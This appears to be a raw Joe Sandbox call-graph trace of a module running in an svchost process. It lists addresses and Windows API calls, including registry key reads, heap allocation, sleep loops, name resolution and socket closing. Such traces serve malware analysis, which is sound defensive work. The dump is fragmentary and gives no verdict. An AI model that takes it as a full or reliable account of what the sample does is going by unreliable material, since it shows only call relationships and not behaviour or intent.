85354->85355 85357 173d0154f29 85355->85357 85358 173d0154eec 85355->85358 85371 173d0154f91 85356->85371 85374 173d0154ea5 85356->85374 85376 173d0154fa7 85356->85376 85357->85356 85387 173d0155aa0 7 API calls 85357->85387 85385 173d0155aa0 7 API calls 85358->85385 85359 173d0164bb0 14 API calls 85362 173d015519c 85359->85362 85361 173d0155028 85389 173d0155aa0 7 API calls 85361->85389 85362->85338 85364 173d0154f0a 85364->85356 85386 173d01874f0 20 API calls 85364->85386 85365 173d015504d 85367 173d0164bb0 14 API calls 85365->85367 85368 173d0155124 85365->85368 85375 173d015508b 85367->85375 85370 173d0164bb0 14 API calls 85368->85370 85368->85374 85370->85374 85388 173d01557c0 17 API calls 85371->85388 85373 173d0155016 85378 173d0164bb0 14 API calls 85373->85378 85374->85359 85375->85368 85377 173d01550aa 85375->85377 85376->85361 85376->85365 85376->85373 85379 173d0155107 85376->85379 85390 173d01557c0 17 API calls 85377->85390 85378->85361 85391 173d01874f0 20 API calls 85379->85391 85382->85344 85383->85337 85384->85337 85385->85364 85386->85356 85387->85356 85388->85374 85389->85365 85390->85374 85391->85365 85392 173d015c8f0 85393 173d0164bb0 14 API calls 85392->85393 85394 173d015c91b 85393->85394 85395 173d015c943 85394->85395 85399 173d01b3940 85394->85399 85405 173d01b5f80 85399->85405 85401 173d01b3966 85402 173d015c937 85401->85402 85410 173d015c270 85401->85410 85404 173d01588f0 free 85402->85404 85404->85395 85406 173d01b5ff1 85405->85406 85407 173d01b5f96 85405->85407 85406->85401 85408 173d01b5fbc free free 85407->85408 85409 173d01b5fb6 free 85407->85409 85408->85401 85409->85408 85411 173d0164bb0 14 API calls 85410->85411 85412 173d015c29b 85411->85412 85413 173d015d280 4 API calls 85412->85413 85414 173d015c2a6 85413->85414 85415 173d015c2cf 85414->85415 85419 173d0155be0 85414->85419 85415->85402 85416 173d015c2c3 85426 173d01588f0 free 85416->85426 85420 173d0155cc2 85419->85420 85421 173d0155c02 85419->85421 85420->85416 85421->85420 
85422 173d0164bb0 14 API calls 85421->85422 85423 173d0155c25 85422->85423 85427 173d0158110 85423->85427 85425 173d0155c6d 85425->85416 85426->85415 85428 173d015818a 85427->85428 85429 173d015812e 85427->85429 85428->85425 85430 173d0158181 closesocket 85429->85430 85431 173d0158179 85429->85431 85432 173d015813f 85429->85432 85430->85428 85437 173d01878b0 free 85431->85437 85436 173d01878b0 free 85432->85436 85435 173d0158147 85435->85425 85436->85435 85437->85430 85438 173cfc10ee0 85439 173cfc10f40 85438->85439 85446 173cfc11d48 85439->85446 85441 173cfc10f97 85449 173cfc0f1e0 85441->85449 85476 173cfc11d40 85446->85476 85448 173cfc11d6d __stdio_common_vsprintf_s 85448->85441 85450 173cfc0f22a 85449->85450 85477 173cfc03c08 85450->85477 85453 173cfc0f2dc memset 85456 173cfc0f300 85453->85456 85454 173cfc0f2f1 85513 173cfc0b88c 6 API calls 4 library calls 85454->85513 85496 173cfc0be20 85456->85496 85458 173cfc0f34d 85461 173cfc0f3fb 85458->85461 85514 173cfc11bd0 19 API calls 85458->85514 85460 173cfc0f553 85463 173cfc0f59c 85460->85463 85465 173cfc0f595 _invalid_parameter_noinfo_noreturn 85460->85465 85461->85460 85515 173cfc03738 _invalid_parameter_noinfo_noreturn 85461->85515 85464 173cfc51a10 _File_size 8 API calls 85463->85464 85466 173cfc0f5b0 85464->85466 85465->85463 85467 173cfc51a10 85466->85467 85468 173cfc51a1a 85467->85468 85469 173cfc10fe4 85468->85469 85470 173cfc52320 IsProcessorFeaturePresent 85468->85470 85471 173cfc52337 85470->85471 85529 173cfc523f4 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 85471->85529 85473 173cfc5234a 85530 173cfc522e8 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 85473->85530 85476->85448 85516 173cfc36700 85477->85516 85479 173cfc03c23 85480 173cfc36700 tidy_global _lock_locales 85479->85480 85484 173cfc03c72 85479->85484 85481 173cfc03c48 85480->85481 85519 173cfc367a0 _unlock_locales 85481->85519 85482 173cfc03cb7 85522 173cfc367a0 _unlock_locales 85482->85522 
85484->85482 85520 173cfc060f0 24 API calls 2 library calls 85484->85520 85486 173cfc03d02 85486->85453 85486->85454 85488 173cfc03cc9 85489 173cfc03ccf 85488->85489 85490 173cfc03d12 85488->85490 85521 173cfc11d9c _CxxThrowException _CxxThrowException malloc std::_Facet_Register 85489->85521 85523 173cfc06a98 _CxxThrowException free free std::bad_alloc::bad_alloc 85490->85523 85497 173cfc36700 tidy_global _lock_locales 85496->85497 85498 173cfc0be3b 85497->85498 85499 173cfc36700 tidy_global _lock_locales 85498->85499 85504 173cfc0be8a 85498->85504 85501 173cfc0be60 85499->85501 85500 173cfc0becf 85527 173cfc367a0 _unlock_locales 85500->85527 85524 173cfc367a0 _unlock_locales 85501->85524 85503 173cfc0bf1a 85503->85458 85504->85500 85525 173cfc0c69c 33 API calls std::_Facet_Register 85504->85525 85507 173cfc0bee1 85508 173cfc0bee7 85507->85508 85509 173cfc0bf2a 85507->85509 85526 173cfc11d9c _CxxThrowException _CxxThrowException malloc std::_Facet_Register 85508->85526 85528 173cfc06a98 _CxxThrowException free free std::bad_alloc::bad_alloc 85509->85528 85513->85456 85514->85458 85517 173cfc3670f _lock_locales 85516->85517 85518 173cfc36717 85516->85518 85517->85518 85518->85479 85519->85484 85520->85488 85521->85482 85522->85486 85524->85504 85525->85507 85526->85500 85527->85503 85529->85473 85531 173d018fec0 memset 85532 173d018feed 85531->85532 85533 173d0189fa1 85568 173d01a4360 85533->85568 85536 173d018ef80 2 API calls 85538 173d0189fd4 85536->85538 85537 173d018a07e 85539 173d015cfb0 10 API calls 85537->85539 85547 173d0189ee0 85537->85547 85540 173d018ef80 2 API calls 85538->85540 85539->85547 85541 173d0189fe7 85540->85541 85543 173d018a01e 85541->85543 85545 173d01a3b60 2 API calls 85541->85545 85546 173d018a04f 85543->85546 85549 173d01a3b60 2 API calls 85543->85549 85544 173d018b0e4 85548 173d018a000 85545->85548 85615 173d01a5b80 85546->85615 85547->85544 85550 173d015cfb0 10 API calls 85547->85550 85553 173d0189840 20 API calls 85547->85553 85557 
173d018ba90 free free 85547->85557 85558 173d0164a70 14 API calls 85547->85558 85636 173d01898c0 85547->85636 85649 173d015a330 85547->85649 85668 173d018f410 QueryPerformanceCounter GetTickCount 85547->85668 85669 173d0187540 18 API calls 85547->85669 85670 173d018f2d0 17 API calls 85547->85670 85632 173d0187650 18 API calls 85548->85632 85552 173d018a031 85549->85552 85550->85547 85633 173d0187650 18 API calls 85552->85633 85553->85547 85557->85547 85558->85547 85561 173d018a0d4 85561->85537 85563 173d018ef80 2 API calls 85561->85563 85566 173d018a0ef 85563->85566 85564 173d018a076 85564->85537 85564->85561 85634 173d0189840 20 API calls 85564->85634 85566->85537 85635 173d0189840 20 API calls 85566->85635 85569 173d01a4383 85568->85569 85570 173d01a43e7 85569->85570 85571 173d01a43b0 85569->85571 85572 173d01a4397 free 85569->85572 85672 173d0164a70 14 API calls 85570->85672 85573 173d01a4400 85571->85573 85576 173d01a43be free 85571->85576 85572->85571 85575 173d01a442b 85573->85575 85578 173d01a4412 85573->85578 85674 173d01b5710 calloc 85575->85674 85671 173d01a9f80 8 API calls 85576->85671 85577 173d0189fa9 85577->85536 85577->85537 85673 173d0164a70 14 API calls 85578->85673 85582 173d01a446f 85582->85577 85584 173d01a4479 free 85582->85584 85583 173d01a43e3 85583->85570 85583->85573 85587 173d01a44e5 85584->85587 85586 173d01a4559 85588 173d01a456a 85586->85588 85676 173d0174440 48 API calls 85586->85676 85675 173d01608d0 91 API calls 85587->85675 85677 173d01758b0 42 API calls 85588->85677 85591 173d01a4574 85608 173d01a4633 85591->85608 85678 173d01726c0 free free free free free 85591->85678 85593 173d01a463e free 85681 173d0184d90 85593->85681 85594 173d01a4665 85599 173d01a4671 85594->85599 85614 173d01a46da 85594->85614 85691 173d01946d0 free _strdup 85594->85691 85595 173d01a458b 85679 173d018ee70 QueryPerformanceCounter GetTickCount 85595->85679 85599->85577 85600 173d01a468f 85600->85614 85692 173d01946d0 free _strdup 85600->85692 85602 173d01a459b 
85605 173d01a45c9 calloc 85602->85605 85610 173d01a45ec 85602->85610 85612 173d01a4620 85602->85612 85604 173d01a46a8 85604->85614 85693 173d01946d0 free _strdup 85604->85693 85605->85599 85605->85610 85608->85593 85608->85594 85609 173d01a45fe free free 85609->85612 85610->85609 85610->85612 85611 173d01a46c1 85611->85614 85694 173d01946d0 free _strdup 85611->85694 85612->85599 85680 173d0175770 17 API calls 85612->85680 85695 173d0173340 free 85614->85695 85698 173d0190160 free free 85615->85698 85619 173d01a5bbe 85620 173d01a5bdf 85619->85620 85621 173d01a5c19 85619->85621 85622 173d018ef80 2 API calls 85619->85622 85620->85564 85621->85620 85623 173d015a330 85 API calls 85621->85623 85624 173d01a5c09 85622->85624 85623->85620 85624->85621 85625 173d01a3b60 2 API calls 85624->85625 85626 173d01a5c29 85625->85626 85627 173d01a5c5c 85626->85627 85628 173d01a5c3c 85626->85628 85781 173d01733d0 8 API calls 85627->85781 85780 173d015cb20 8 API calls 85628->85780 85631 173d01a5c56 85631->85621 85631->85627 85632->85543 85633->85546 85634->85561 85635->85537 85637 173d01898eb 85636->85637 85638 173d01898f2 85636->85638 85637->85547 86091 173d01526f0 85638->86091 85650 173d015a339 85649->85650 85658 173d015a46b 85649->85658 85651 173d015a427 85650->85651 85652 173d015a46d 85650->85652 85650->85658 85654 173d0164b60 18 API calls 85651->85654 85653 173d0164b60 18 API calls 85652->85653 85655 173d015a47f 85653->85655 85656 173d015a44e 85654->85656 86107 173d015bae0 85655->86107 86098 173d015b4c0 85656->86098 85658->85547 85661 173d015a4aa 86118 173d0158c90 85661->86118 85665 173d0158c90 15 API calls 85666 173d015a4c1 85665->85666 86122 173d01a5720 32 API calls 85666->86122 85668->85547 85669->85547 85670->85547 85671->85583 85672->85577 85673->85577 85674->85582 85675->85586 85676->85588 85677->85591 85678->85595 85679->85602 85680->85608 85682 173d0184dc6 85681->85682 85696 173d01850f0 8 API calls 85682->85696 85684 173d0184de2 85685 173d0184dfc 85684->85685 85686 
173d0184dee 85684->85686 85689 173d0184e17 _strdup 85685->85689 85690 173d0184e06 85685->85690 85697 173d0167c70 free 85686->85697 85688 173d0184df3 85688->85594 85689->85594 85690->85594 85691->85600 85692->85604 85693->85611 85694->85614 85695->85599 85696->85684 85697->85688 85782 173d0193920 85698->85782 85700 173d01901b0 85792 173d01665c0 85700->85792 85702 173d01901ca 85703 173d01a6b50 85702->85703 85704 173d01a6b9d 85703->85704 85778 173d01a6b93 85703->85778 85810 173d01a6910 calloc 85704->85810 85706 173d01a6ba2 85706->85778 85818 173d01a8670 85706->85818 85707 173d01b9e10 8 API calls 85709 173d01a74ce 85707->85709 85709->85619 85711 173d01a6bea 85713 173d01a6bf6 _strdup 85711->85713 85714 173d01a6c08 85711->85714 85712 173d01a6bd8 _strdup 85712->85711 85712->85778 85713->85714 85713->85778 85715 173d01a6c26 85714->85715 85716 173d01a6c14 _strdup 85714->85716 85888 173d01a74f0 85715->85888 85716->85715 85716->85778 85720 173d0184eb0 8 API calls 85721 173d01a6c9c 85720->85721 85721->85778 85937 173d01a7960 85721->85937 85723 173d01a6d0c _strdup 85724 173d01a6d22 85723->85724 85723->85778 85725 173d01a6d30 _strdup 85724->85725 85726 173d01a6d46 85724->85726 85725->85726 85726->85778 85962 173d01a7e20 85726->85962 85728 173d01a6d60 85729 173d0184d90 10 API calls 85728->85729 85728->85778 85730 173d01a6eb2 85729->85730 85731 173d01a6efd 85730->85731 85732 173d01a6f92 85730->85732 85730->85778 85733 173d01a6f82 85731->85733 85734 173d01a6f38 85731->85734 85732->85778 85978 173d015ad70 85732->85978 85736 173d01a5fc0 23 API calls 85733->85736 86021 173d0159b70 6 API calls 85734->86021 85736->85778 85737 173d01a6fe3 85741 173d01a7303 85737->85741 85759 173d01a70f3 85737->85759 85739 173d01a6f4e 85740 173d01a9050 12 API calls 85739->85740 85739->85778 85749 173d01a6f60 85740->85749 85742 173d01a749d 85741->85742 86023 173d0159ee0 85 API calls 85741->86023 85743 173d0164b60 18 API calls 85742->85743 85745 173d01a74ac 85743->85745 86026 173d01a5720 32 API calls 
85745->86026 85746 173d01a733c 85747 173d01a748e 85746->85747 85751 173d01a7345 85746->85751 85752 173d0164b60 18 API calls 85747->85752 85749->85733 85753 173d01a6f69 85749->85753 85750 173d01a737c 86024 173d01b4ee0 15 API calls 85750->86024 85751->85750 85754 173d0164b60 18 API calls 85751->85754 85752->85742 85753->85778 85756 173d01a736e 85754->85756 85756->85742 85756->85750 85757 173d01a7387 85758 173d01a7391 85757->85758 85757->85778 86025 173d0159b70 6 API calls 85758->86025 85760 173d01a714e 85759->85760 85761 173d01a70fc free free 85759->85761 85762 173d01a7163 free free free free 85760->85762 85763 173d01a7207 free free free 85760->85763 85761->85760 85762->85763 86022 173d01a5720 32 API calls 85763->86022 85767 173d01a73d1 85768 173d01a72fe 85767->85768 85773 173d0164b60 18 API calls 85767->85773 85987 173d01a5fc0 85768->85987 85770 173d01a73a7 85770->85767 85772 173d0164b60 18 API calls 85770->85772 85770->85778 85772->85767 85775 173d01a73ff 85773->85775 85774 173d01a7417 85991 173d01a9050 85774->85991 85775->85768 85778->85707 85780->85631 85781->85621 85783 173d0193944 85782->85783 85784 173d0193936 85782->85784 85804 173d0164d90 18 API calls 85783->85804 85803 173d0164d90 18 API calls 85784->85803 85787 173d0193950 85805 173d0194380 free 85787->85805 85789 173d019399c 85789->85700 85790 173d0193942 85790->85789 85791 173d0193987 free 85790->85791 85791->85789 85791->85790 85793 173d0166691 85792->85793 85795 173d01665dd 85792->85795 85793->85702 85794 173d0166630 85794->85793 85808 173d0189180 261 API calls 85794->85808 85795->85793 85795->85794 85806 173d0189180 261 API calls 85795->85806 85798 173d0166626 85807 173d01a53c0 261 API calls 85798->85807 85799 173d016667c 85809 173d01a53c0 261 API calls 85799->85809 85802 173d0166686 85802->85702 85803->85790 85804->85787 85805->85790 85806->85798 85807->85794 85808->85799 85809->85802 85811 173d01a6939 85810->85811 85812 173d01a6ab8 85810->85812 85813 173d01a3b60 2 API calls 85811->85813 85812->85706 
85814 173d01a6998 85813->85814 85815 173d01a6a95 _strdup 85814->85815 85816 173d01a6ae9 85814->85816 85815->85816 85817 173d01a6aa7 free free 85815->85817 85816->85706 85817->85812 85819 173d01a868b 85818->85819 85820 173d01a86aa 85818->85820 85819->85820 85821 173d01a8694 85819->85821 86029 173d01a9110 19 API calls 85820->86029 86027 173d01a9110 19 API calls 85821->86027 85823 173d01a86b2 86030 173d0171840 calloc 85823->86030 85826 173d01a869c 86028 173d01a9e10 22 API calls 85826->86028 85828 173d01a86a8 85829 173d01a86b7 85828->85829 85832 173d01a873d 85829->85832 85836 173d0184d90 10 API calls 85829->85836 85840 173d01a6bc2 85829->85840 85830 173d01a881d 86033 173d01a9f80 8 API calls 85830->86033 85832->85830 85834 173d01a87e2 85832->85834 85835 173d01a8792 85832->85835 85833 173d01a884a 85833->85840 86034 173d01a9f80 8 API calls 85833->86034 86032 173d01a9f80 8 API calls 85834->86032 86031 173d0164a70 14 API calls 85835->86031 85837 173d01a871b 85836->85837 85837->85832 85837->85840 85843 173d01a8730 free 85837->85843 85840->85711 85840->85712 85840->85778 85841 173d01a87f4 85841->85830 85841->85840 85844 173d01a8810 free 85841->85844 85843->85832 85844->85830 85845 173d01a89f5 86037 173d0164a70 14 API calls 85845->86037 85846 173d01a88cd _strdup 85846->85840 85852 173d01a8865 85846->85852 85849 173d01a8da2 86048 173d0164a70 14 API calls 85849->86048 85852->85840 85852->85845 85852->85846 85853 173d01a8945 free 85852->85853 85854 173d01a8978 free 85852->85854 85855 173d01a9f80 8 API calls 85852->85855 85856 173d01a8a36 85852->85856 85861 173d01a89bf free 85852->85861 85862 173d01a8a14 85852->85862 86035 173d01a99f0 34 API calls 85852->86035 86036 173d0175520 16 API calls 85852->86036 85853->85852 85854->85852 85855->85852 85856->85849 85858 173d01a8aee 85856->85858 85857 173d01a8b8e 85857->85840 85859 173d01a8c45 85857->85859 86041 173d01a9f80 8 API calls 85857->86041 85858->85857 86038 173d01a9f80 8 API calls 85858->86038 85859->85840 86044 173d01a9f80 8 API 
calls 85859->86044 85861->85852 85864 173d0164b60 18 API calls 85862->85864 85864->85856 85866 173d01a8b25 85866->85857 85869 173d01a8b2f 85866->85869 85867 173d01a8bb2 85870 173d01a8bb8 85867->85870 85880 173d01a8c24 85867->85880 85868 173d01a8c69 85871 173d01a8cac 85868->85871 85872 173d01a8c6f _strdup 85868->85872 86039 173d0169250 malloc free 85869->86039 86042 173d0169250 malloc free 85870->86042 85871->85840 86045 173d01a9f80 8 API calls 85871->86045 85872->85840 85872->85871 85875 173d01a8b5d 85875->85840 86040 173d01946d0 free _strdup 85875->86040 85876 173d01a8be5 85876->85840 85876->85880 85879 173d01a8ccf 85879->85840 86046 173d01a9f80 8 API calls 85879->86046 85880->85840 85880->85859 86043 173d01946d0 free _strdup 85880->86043 85882 173d01a8b7d 85882->85840 85882->85857 85884 173d01a8d11 85885 173d01a8d31 strtoul 85884->85885 85886 173d01a8d15 85884->85886 85885->85886 85886->85840 86047 173d01a9f80 8 API calls 85886->86047 85889 173d01a7574 85888->85889 85890 173d01a7527 _strdup 85888->85890 85892 173d01a7582 _strdup 85889->85892 85893 173d01a75c7 85889->85893 85891 173d01a755f _strdup 85890->85891 85912 173d01a759f 85890->85912 85891->85889 85896 173d01a75a9 free 85891->85896 85892->85893 85897 173d01a7590 85892->85897 85894 173d01a75e1 85893->85894 85895 173d01a75d3 _strdup 85893->85895 85899 173d01a7635 85894->85899 86050 173d0171bf0 realloc GetEnvironmentVariableA realloc free 85894->86050 85895->85894 85895->85897 85898 173d01a7920 free free 85896->85898 86049 173d0164a70 14 API calls 85897->86049 85901 173d01b9e10 8 API calls 85898->85901 86052 173d018c300 21 API calls 85899->86052 85904 173d01a6c3e 85901->85904 85904->85720 85904->85721 85904->85778 85905 173d01a7601 85907 173d01a7618 85905->85907 86051 173d0171bf0 realloc GetEnvironmentVariableA realloc free 85905->86051 85906 173d01a764f 85908 173d01a7653 free free free 85906->85908 85909 173d01a7677 85906->85909 85907->85899 85911 173d0164b60 18 API calls 85907->85911 85908->85912 85913 
173d01a773f free 85909->85913 85914 173d0184eb0 8 API calls 85909->85914 85911->85899 85912->85898 85917 173d01a774d 85913->85917 85919 173d01a7777 85913->85919 85916 173d01a76ae 85914->85916 85915 173d01a776c free 85915->85919 86053 173d0171bf0 realloc GetEnvironmentVariableA realloc free 85916->86053 85917->85915 85917->85919 85918 173d01a7792 free 85920 173d01a779d 85918->85920 85919->85918 85919->85920 85920->85912 85922 173d01a7820 85920->85922 86057 173d01a81c0 63 API calls 85920->86057 85929 173d01a784b 85922->85929 86058 173d01a81c0 63 API calls 85922->86058 85924 173d01a7722 85924->85913 85927 173d0164b60 18 API calls 85924->85927 85925 173d01a780b free 85925->85912 85925->85922 85927->85913 85928 173d01a7836 free 85928->85912 85928->85929 85929->85912 85931 173d01a78c8 free 85929->85931 85930 173d01a76f4 85930->85924 86055 173d0171bf0 realloc GetEnvironmentVariableA realloc free 85930->86055 85931->85912 85933 173d01a76b8 85933->85924 85933->85930 86054 173d0171bf0 realloc GetEnvironmentVariableA realloc free 85933->86054 85934 173d01a770b 85934->85924 86056 173d0171bf0 realloc GetEnvironmentVariableA realloc free 85934->86056 85938 173d01a799c free _strdup 85937->85938 85939 173d01a79c6 85937->85939 85938->85939 85959 173d01a6cc8 85938->85959 85940 173d01a79d2 free free 85939->85940 85941 173d01a79ea 85939->85941 85940->85941 85942 173d01a7ace 85941->85942 86059 173d018bd10 38 API calls 85941->86059 85950 173d01a7ae7 85942->85950 86061 173d01946d0 free _strdup 85942->86061 85944 173d01a7b71 85956 173d01a7b88 85944->85956 86062 173d01946d0 free _strdup 85944->86062 85945 173d01a7a32 85947 173d01a7a60 85945->85947 85948 173d01a7a36 85945->85948 85952 173d01a7a5e 85947->85952 85953 173d01a7a62 85947->85953 85951 173d0164b60 18 API calls 85948->85951 85950->85944 85954 173d01a7b52 _strdup 85950->85954 85950->85959 85951->85952 85957 173d01a7a87 free _strdup 85952->85957 85958 173d01a7aa8 85952->85958 86060 173d0164a70 14 API calls 85953->86060 85954->85944 
85954->85959 85956->85959 85960 173d01a7bd2 _strdup 85956->85960 85957->85958 85957->85959 85958->85942 85961 173d01a7ab5 _strdup 85958->85961 85959->85723 85959->85724 85959->85778 85960->85959 85961->85942 85961->85959 85972 173d01a7e52 85962->85972 85963 173d01a8058 85963->85728 85964 173d01a8066 85964->85963 86064 173d0151130 _time64 free free free 85964->86064 85965 173d0184d90 10 API calls 85965->85972 85967 173d01a7f2a strchr 85969 173d01a7f3c strtol 85967->85969 85967->85972 85968 173d01a80cc 85968->85963 85970 173d01a80d4 _strdup 85968->85970 85969->85972 85970->85963 85976 173d01a80f8 85970->85976 85972->85963 85972->85964 85972->85965 85972->85967 85973 173d01a7fdc free 85972->85973 85974 173d01a7ef7 free 85972->85974 85975 173d0164b60 18 API calls 85972->85975 86063 173d01a7c10 24 API calls 85972->86063 85973->85972 85974->85972 85975->85972 85977 173d0164b60 18 API calls 85976->85977 85977->85963 85979 173d015ad79 85978->85979 85982 173d015af68 85978->85982 85981 173d01a3b60 2 API calls 85979->85981 85983 173d015aef9 85979->85983 85980 173d01b9e10 8 API calls 85980->85982 85984 173d015adfc 85981->85984 85982->85737 85983->85980 85984->85983 85986 173d015a330 85 API calls 85984->85986 86065 173d01a58e0 20 API calls 85984->86065 85986->85984 85988 173d01a5fd2 85987->85988 86066 173d0190690 85988->86066 85990 173d01a6022 85990->85774 85992 173d01a9070 85991->85992 85993 173d01a909b 85992->85993 85994 173d01a9092 free 85992->85994 85998 173d01a741f 85992->85998 85995 173d01a90b5 _strdup 85993->85995 85996 173d01a90a7 85993->85996 85994->85993 85995->85998 85997 173d0184d90 10 API calls 85996->85997 85997->85998 85998->85778 85999 173d01a8e00 85998->85999 86000 173d015cfb0 10 API calls 85999->86000 86003 173d01a8e29 86000->86003 86001 173d01a8f9d calloc 86002 173d01a8fcb 86001->86002 86014 173d01a8f13 86001->86014 86089 173d0161b60 calloc free memmove 86002->86089 86003->86001 86004 173d01a8e80 _strdup 86003->86004 86005 173d01a8e58 strncmp 86003->86005 
86013 173d01a8ef3 86004->86013 86004->86014 86005->86004 86007 173d01a8e6f 86005->86007 86007->86001 86007->86004 86008 173d01a8fe3 86010 173d01a9026 86008->86010 86011 173d01a9006 free 86008->86011 86090 173d0164a70 14 API calls 86008->86090 86010->86014 86011->86014 86013->86014 86015 173d01a8f72 86013->86015 86016 173d01a8f20 86013->86016 86014->85778 86015->86014 86088 173d0164a70 14 API calls 86015->86088 86017 173d01a3b60 2 API calls 86016->86017 86018 173d01a8f36 86017->86018 86087 173d0164a70 14 API calls 86018->86087 86021->85739 86023->85746 86024->85757 86025->85770 86027->85826 86028->85828 86029->85823 86031->85840 86032->85841 86033->85833 86034->85852 86035->85846 86036->85852 86037->85840 86038->85866 86039->85875 86040->85882 86041->85867 86042->85876 86043->85859 86044->85868 86045->85879 86046->85884 86047->85840 86048->85840 86049->85912 86050->85905 86051->85907 86052->85906 86053->85933 86054->85930 86055->85934 86056->85924 86057->85925 86058->85928 86059->85945 86060->85959 86061->85950 86062->85956 86063->85972 86064->85968 86065->85984 86067 173d01a3b60 2 API calls 86066->86067 86068 173d01906af 86067->86068 86073 173d01939c0 86068->86073 86070 173d01906fa 86072 173d0190710 86070->86072 86083 173d01532b0 free free 86070->86083 86072->85990 86074 173d01939db 86073->86074 86075 173d0193a1d 86073->86075 86084 173d0164d90 18 API calls 86074->86084 86075->86070 86077 173d0193a0e 86085 173d0194380 free 86077->86085 86079 173d01939ee 86079->86077 86080 173d0193a2f 86079->86080 86086 173d0164a70 14 API calls 86080->86086 86082 173d0193a47 86082->86070 86083->86072 86084->86079 86085->86075 86086->86082 86087->86014 86088->86014 86089->86008 86090->86011 86092 173d0152705 86091->86092 86093 173d0152720 86091->86093 86092->86093 86094 173d0152714 86092->86094 86097 173d0164930 WaitForSingleObjectEx CloseHandle 86094->86097 86096 173d0152719 86096->86093 86097->86096 86099 173d015b4eb 86098->86099 86101 173d015b690 86099->86101 86105 173d015b511 
86099->86105 86123 173d015b9f0 43 API calls 86099->86123 86101->85658 86102 173d015bae0 27 API calls 86102->86105 86104 173d0158c90 15 API calls 86104->86105 86105->86101 86105->86102 86105->86104 86124 173d01a5720 32 API calls 86105->86124 86125 173d015be20 14 API calls 86105->86125 86108 173d015baf9 86107->86108 86116 173d015a495 86107->86116 86109 173d015bb08 86108->86109 86126 173d0174ff0 free free 86108->86126 86127 173d017e150 8 API calls 86109->86127 86116->85661 86117 173d015b9f0 43 API calls 86116->86117 86117->85661 86119 173d0158cba 86118->86119 86120 173d0158cb1 86118->86120 86119->85665 86128 173d01555f0 86120->86128 86123->86105 86125->86105 86126->86109 86129 173d0164bb0 14 API calls 86128->86129 86130 173d0155612 86129->86130 86135 173d0155b30 86130->86135 86132 173d015563f 86132->86119 86136 173d0155b4a 86135->86136 86137 173d015561d 86135->86137 86139 173d0155b70 86136->86139 86142 173d01588f0 free 86136->86142 86137->86132 86141 173d01588f0 free 86137->86141 86139->86137 86143 173d01588f0 free 86139->86143 86141->86132 86142->86139 86143->86137 86144 173d03b1bc0 86151 173d03b1724 GetProcessHeap HeapAlloc 86144->86151 86146 173d03b1bd6 SleepEx 86147 173d03b1724 50 API calls 86146->86147 86149 173d03b1bcf 86147->86149 86149->86146 86150 173d03b159c StrCmpIW StrCmpW 86149->86150 86202 173d03b19b0 12 API calls 86149->86202 86150->86149 86203 173d03b1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 86151->86203 86153 173d03b174c 86204 173d03b1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 86153->86204 86155 173d03b1754 86205 173d03b1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 86155->86205 86157 173d03b175d 86206 173d03b1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 86157->86206 86159 173d03b1766 86207 173d03b1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 86159->86207 86161 173d03b176f 86208 173d03b1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 86161->86208 86163 173d03b1778 86209 173d03b1000 GetProcessHeap 
HeapAlloc GetProcessHeap HeapAlloc 86163->86209 86165 173d03b1781 86210 173d03b1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 86165->86210 86167 173d03b178a RegOpenKeyExW 86168 173d03b17bc RegOpenKeyExW 86167->86168 86169 173d03b19a2 86167->86169 86170 173d03b17fb RegOpenKeyExW 86168->86170 86171 173d03b17e5 86168->86171 86169->86149 86173 173d03b181f 86170->86173 86174 173d03b1836 RegOpenKeyExW 86170->86174 86211 173d03b12b8 16 API calls 86171->86211 86212 173d03b104c 6 API calls 86173->86212 86177 173d03b1871 RegOpenKeyExW 86174->86177 86178 173d03b185a 86174->86178 86175 173d03b17f1 RegCloseKey 86175->86170 86179 173d03b18ac RegOpenKeyExW 86177->86179 86180 173d03b1895 86177->86180 86213 173d03b12b8 16 API calls 86178->86213 86185 173d03b18d0 86179->86185 86186 173d03b18e7 RegOpenKeyExW 86179->86186 86214 173d03b12b8 16 API calls 86180->86214 86181 173d03b182c RegCloseKey 86181->86174 86183 173d03b1867 RegCloseKey 86183->86177 86215 173d03b12b8 16 API calls 86185->86215 86189 173d03b190b 86186->86189 86190 173d03b1922 RegOpenKeyExW 86186->86190 86187 173d03b18a2 RegCloseKey 86187->86179 86216 173d03b104c 6 API calls 86189->86216 86193 173d03b195d RegOpenKeyExW 86190->86193 86194 173d03b1946 86190->86194 86191 173d03b18dd RegCloseKey 86191->86186 86195 173d03b1981 86193->86195 86196 173d03b1998 RegCloseKey 86193->86196 86217 173d03b104c 6 API calls 86194->86217 86218 173d03b104c 6 API calls 86195->86218 86196->86169 86197 173d03b1918 RegCloseKey 86197->86190 86199 173d03b1953 RegCloseKey 86199->86193 86201 173d03b198e RegCloseKey 86201->86196 86203->86153 86204->86155 86205->86157 86206->86159 86207->86161 86208->86163 86209->86165 86210->86167 86211->86175 86212->86181 86213->86183 86214->86187 86215->86191 86216->86197 86217->86199 86218->86201 86219 173d0152940 86220 173d0184eb0 8 API calls 86219->86220 86221 173d015297f 86220->86221 86238 173d01616f0 getaddrinfo 86221->86238 86224 173d015299b WSAGetLastError 86226 173d01529a5 WSAGetLastError 
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProcfree
